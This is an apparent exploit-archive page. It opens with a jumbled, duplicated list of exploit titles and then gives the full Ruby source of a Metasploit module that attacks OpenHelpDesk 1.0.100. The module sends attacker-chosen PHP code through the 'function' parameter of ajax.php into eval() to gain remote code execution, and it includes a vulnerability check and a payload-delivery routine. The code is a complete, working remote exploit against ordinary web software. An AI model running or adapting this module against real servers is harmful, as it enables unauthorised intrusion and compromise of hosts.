477bcbdcc0
5 new exploits phpMyNewsletter <= 0.8 (beta5) - Multiple Vulnerability Exploit phpMyNewsletter <= 0.8 (beta5) - Multiple Vulnerabilities My Book World Edition NAS Multiple Vulnerability My Book World Edition NAS - Multiple Vulnerabilities Katalog Stron Hurricane 1.3.5 - Multiple Vulnerability RFI / SQL Katalog Stron Hurricane 1.3.5 - (RFI / SQL) Multiple Vulnerabilities cmsfaethon-2.2.0-ultimate.7z Multiple Vulnerability cmsfaethon-2.2.0-ultimate.7z - Multiple Vulnerabilities DynPG CMS 4.1.0 - Multiple Vulnerability (popup.php and counter.php) DynPG CMS 4.1.0 - (popup.php and counter.php) Multiple Vulnerabilities Nucleus CMS 3.51 (DIR_LIBS) - Multiple Vulnerability Nucleus CMS 3.51 (DIR_LIBS) - Multiple Vulnerabilities N/X - Web CMS (N/X WCMS 4.5) Multiple Vulnerability N/X - Web CMS (N/X WCMS 4.5) - Multiple Vulnerabilities New-CMS - Multiple Vulnerability New-CMS - Multiple Vulnerabilities Edgephp Clickbank Affiliate Marketplace Script Multiple Vulnerability Edgephp Clickbank Affiliate Marketplace Script - Multiple Vulnerabilities JV2 Folder Gallery 3.1.1 - (popup_slideshow.php) Multiple Vulnerability JV2 Folder Gallery 3.1.1 - (popup_slideshow.php) Multiple Vulnerabilities i-Gallery - Multiple Vulnerability i-Gallery - Multiple Vulnerabilities My Kazaam Notes Management System Multiple Vulnerability My Kazaam Notes Management System - Multiple Vulnerabilities Omnidocs - Multiple Vulnerability Omnidocs - Multiple Vulnerabilities Web Cookbook Multiple Vulnerability Web Cookbook - Multiple Vulnerabilities KikChat - (LFI/RCE) Multiple Vulnerability KikChat - (LFI/RCE) Multiple Vulnerabilities Webformatique Reservation Manager - 'index.php' Cross-Site Scripting Vulnerability Webformatique Reservation Manager 2.4 - 'index.php' Cross-Site Scripting Vulnerability xEpan 1.0.4 - Multiple Vulnerability xEpan 1.0.4 - Multiple Vulnerabilities AKIPS Network Monitor 15.37 through 16.5 - OS Command Injection Netwrix Auditor 7.1.322.0 - ActiveX (sourceFile) Stack Buffer Overflow Cisco UCS Manager 2.1(1b) - Shellshock Exploit OpenSSH <= 7.2p1 - xauth Injection FreeBSD 10.2 amd64 Kernel - amd64_set_ldt Heap Overflow
90 lines
2.6 KiB
Ruby
Executable file
90 lines
2.6 KiB
Ruby
Executable file
##
|
|
# $Id: php_eval.rb 5783 2008-10-23 02:43:21Z ramon $
|
|
##
|
|
|
|
##
|
|
# This file is part of the Metasploit Framework and may be subject to
|
|
# redistribution and commercial restrictions. Please see the Metasploit
|
|
# Framework web site for more information on licensing and terms of use.
|
|
# http://metasploit.com/projects/Framework/
|
|
##
|
|
|
|
|
|
require 'msf/core'
|
|
|
|
|
|
class Metasploit3 < Msf::Exploit::Remote
|
|
|
|
include Msf::Exploit::Remote::HttpClient
|
|
|
|
def initialize(info = {})
|
|
super(update_info(info,
|
|
'Name' => 'OpenHelpDesk eval (previously unpublished)',
|
|
'Description' => %q{
|
|
OpenHelpDesk version 1.0.100 is vulnerable to a php code
|
|
execution vulnerability due to improper use of eval().
|
|
The php.ini register_globals directive is *not* required to be
|
|
on to exploit this vulnerability. There is no known public
|
|
exploit for this vulnerability.
|
|
},
|
|
'Author' => [ 'LSO <lso@hushmail.com>' ],
|
|
'License' => BSD_LICENSE,
|
|
'Version' => '$Revision$',
|
|
'References' => [ 'URL' , 'http://sourceforge.net/projects/openhelpdesk' ],
|
|
'Privileged' => false,
|
|
'Platform' => ['php'],
|
|
'Arch' => ARCH_PHP,
|
|
'Payload' =>
|
|
{
|
|
'Space' => 4000, # max url length for some old
|
|
# versions of apache according to
|
|
# http://www.boutell.com/newfaq/misc/urllength.html
|
|
'DisableNops' => true,
|
|
'BadChars' => %q|'"`|, # quotes are escaped by PHP's magic_quotes_gpc in a default install
|
|
'Compat' =>
|
|
{
|
|
'ConnectionType' => 'find',
|
|
},
|
|
'Keys' => ['php'],
|
|
},
|
|
'Targets' => [ ['Automatic', { }], ],
|
|
'DefaultTarget' => 0
|
|
))
|
|
|
|
register_options(
|
|
[
|
|
OptString.new('URIPATH', [ true, "The URI of ajax.php ", '/openhelpdesk/ajax.php']),
|
|
], self.class)
|
|
|
|
end
|
|
|
|
def check
|
|
tester = rand_text_alpha(10)
|
|
php_code = "echo('#{tester}');"
|
|
|
|
response = eval_sploit(php_code)
|
|
|
|
#print_status(response)
|
|
if (response && response.body.match(tester).to_a.first)
|
|
print_status("PHP code execution achieved; safe_mode or disable_functions might still prevent host compromise")
|
|
checkcode = Exploit::CheckCode::Vulnerable
|
|
else
|
|
checkcode = Exploit::CheckCode::Safe
|
|
end
|
|
return checkcode
|
|
end
|
|
|
|
def exploit
|
|
response = eval_sploit(payload.encoded)
|
|
|
|
handler
|
|
end
|
|
|
|
def eval_sploit(php_code)
|
|
uri = datastore['URIPATH'] + "?function=" + php_code + "//"
|
|
response = send_request_raw({ 'uri' => uri },1)
|
|
return response
|
|
end
|
|
end
|
|
|
|
# milw0rm.com [2009-02-02]
|